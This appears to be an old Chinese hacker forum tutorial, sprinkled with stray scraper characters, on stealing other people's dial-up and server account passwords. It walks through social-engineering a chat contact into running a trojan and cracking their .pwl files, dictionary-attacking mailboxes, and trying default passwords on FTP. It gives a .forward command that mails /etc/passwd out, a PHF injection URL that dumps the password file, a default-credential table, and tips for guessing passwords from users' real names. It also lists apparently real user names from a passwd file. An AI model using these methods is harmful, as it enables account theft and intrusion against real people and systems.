如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。
( m; Z, z- m5 D4 K5 _- v. S0 o' _方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。! D# V8 }; ^5 K5 E# r
优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......
4 S- n* k1 M @9 ~8 T* o缺点:只有一个,那就是如何让对方乖乖的运行你的程序。( ?2 u; @. x: J9 A/ z
提示:先问清你的目标和你是不是在一个城市。
8 @$ |9 f. T& D; {/ V# k/ u* r实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。7 z9 D# b* q, b6 x4 h5 R! a
哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。
9 e( O+ f) J+ w% T4 F忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。. p$ {0 n) a* Z5 Y+ t
方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客; D8 C. G" K/ m
优点:没什么优点
& I/ j$ I- I$ G5 X. O+ ^9 _缺点:要具体情况具体对待,太麻烦" j' ]. D, Z& M2 Z' b, G: f
提示:平时多多留神。% t: R% C4 `! X
譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net( m+ o/ @9 a+ Y2 ~0 @. ^; j
密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。
! Y. `7 O, Y7 W$ v5 s, I! @1 V运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破; ?) o% t. {/ I
方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。
4 [/ ~' H. c2 Q优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。
5 y; t3 k5 T' t: |, M缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。5 m6 V5 ]3 F* H/ c
由于介绍此类的教学文章比较多,我就不班门弄斧了。
1 m5 m' `8 a% ?
, f0 j* v, h/ X) o6 Z- ~哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。
2 q/ Q, S! m) v2 e8 v只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。
; Z2 K. Z- ~( h1 e( i1 @. J. \有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:# n) g7 D6 y: E3 _- m+ B0 ~) y
. [0 d2 e A) @$ X6 S------------------------------
2 F7 I1 M; I" Q0 W
/ {, ]2 X% p2 _( EXXX,你好(XX是你在表格上填的名字)
6 E2 l' t4 E, w8 B你在XX热线的主页空间已开通% j1 Y4 i6 g \- J5 e- w: @ f. D
帐户名:XXX 密码:11# s. _0 @3 F/ m
-----------XX热线
/ U* z3 Q& ?0 n: X' A( T$ `$ v$ B& v, Q电话:XXXX-XXXXXXXX5 d( M a. K1 Z0 L* p6 R% q( U' j) ?# J# ~
------------------------------% t# [* \% V( D3 f z1 |
7 n9 u0 Q7 B6 ?3 g( a5 o9 j好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。: q# e& d9 R0 Z9 j' P
开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。
4 B2 F% J0 r, a! B上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!
! h; T/ I8 y! _" K$ x
+ @* W0 Q d4 ?& U
4 S5 I4 ]) m& z* h" \# j% d 如何获得第一个帐号7 z6 G5 `1 V+ I' Y9 g+ `. ]% u
, Q' `/ U/ w# u; V6 U" Y我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.1 ]4 ?3 H. o' r: v, F
+ R) r4 ^% z9 H2 ~
确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。2 h( u- R- ]/ @5 Y
+ i/ A# Y, ~, ^6 M* u如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.
5 C. ~* G% \* }0 o; v, N: S/ @6 w. V
以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-< 5 ~3 Y! R6 F7 Q, P
" d+ b8 I0 t6 F- e. |7 \ j还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!) g" J- B0 Y7 G+ R3 J6 I
0 j, c+ [( p) t# J很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:
# i9 ~" \4 I4 S% n0 O6 x$ t6 @2 u% g4 I1 g1 h
帐号 密码, B2 p/ Q7 i2 h7 ^+ l
----------- ----------------
/ v$ Q1 p. _, I& S) s! A2 B4 Broot root
2 S) W, r0 n4 O* h5 lsys sys/system/bin
* {/ y5 j; n: Rbin sys/bin
5 w* N1 O1 y. Q3 D A4 Xmountfsys mountfsys
. c" K8 W( v. W( H1 ^3 o/ Jadm adm( l7 e! U |" l0 P; N: g
uucp uucp
5 A% s$ q) S: O8 onuucp anon8 |3 d* |5 A/ Z! [ ~
anon anon4 F9 R5 K6 N+ w9 U# f
user user! F) a0 `5 k9 A- J
games games
1 \$ x! J) R6 r8 U6 m; w; Tinstall install
) A' {$ L4 ^, r' Y1 |6 d. G- Nreboot 给 "command login" 用的
* \; h, ^( H2 Q- idemo demo; w/ s; o+ L$ M$ E' G
umountfsys umountfsys
7 u0 j5 [5 P; e; f% c/ \9 `sync sync' k# `! G( x: h8 x7 y
admin admin1 w' f8 l+ K- }8 `
guest guest
2 P g& k+ O, D) g6 d; ?$ l; _daemon daemon% k/ u r$ w0 Q! h0 o6 ^ |# x
________________________________________________________________
& ^ a. O2 l2 @% ~4 B
3 O; W! H+ w* T" N有些管理员忘记把他们改掉,那你就发财了!
8 } H0 r* ~2 T6 c Z4 X6 r8 ^2 w) K) k, J% m5 G! m! R# y
另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.
6 Q0 f' {# o/ e0 S5 P# Q& k0 x) o" O6 H9 y. [
只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:
( b$ K* T6 j1 D
, N& O$ A3 |7 _: d( e6 F" H4 p9 V.........
+ M1 k+ O3 T" c) U( ~% Y( M# x& @ b: u
xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
& F3 E; C) p2 ?6 g7 l9 \0 ~* X% _6 }
qingyuan:x:275:50::/usr/qingyuan:/bin/sh
2 _0 G: L! C( L2 s6 p& X/ U9 B! z! {
+ z! U- Z/ x# I1 z8 e5 u1 Hhjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh% h9 W% s9 V/ I+ d8 L' E* I) l
4 P0 Q: `, a n+ O$ H1 s) \
smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
, e7 R2 x4 L# l6 r: w. u: ~
6 O6 |# U$ t$ o( k3 Skyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh- x6 ^: ^8 a3 l( I2 k& _
% h) i3 v4 O$ D
brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh
! ~$ U4 i- b" u0 i# r8 A$ ?( z) Q& `6 N* e2 p' \, J
tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh8 I, F o; k8 _+ T% f# ?
- i; i4 a) P0 O& n6 ~
............4 N+ G* C& w" E
0 B4 m+ @! }6 r! Y
这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.# k; j0 E3 j e: e' R5 K
, M* q" o( J( J: g. c- v! F
如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.
8 C) b* c9 y% W: B& Z4 N1 i. ^- d( |! i2 k
当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.
: E# ~/ C! n8 b0 T& _& p
. j N, v" d n如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.
4 b; d1 b- K6 w
3 a& J+ }5 S5 e8 U! g最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.: ]* j) _5 P2 l2 c5 y$ U
5 c: g3 s% m, S3 b8 B5 ^* ~你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我.
* e$ }3 e) n E: m5 O8 b. H! ]1 ]; Z! C% g, W) P+ ]5 V, {+ `" P9 I# N
|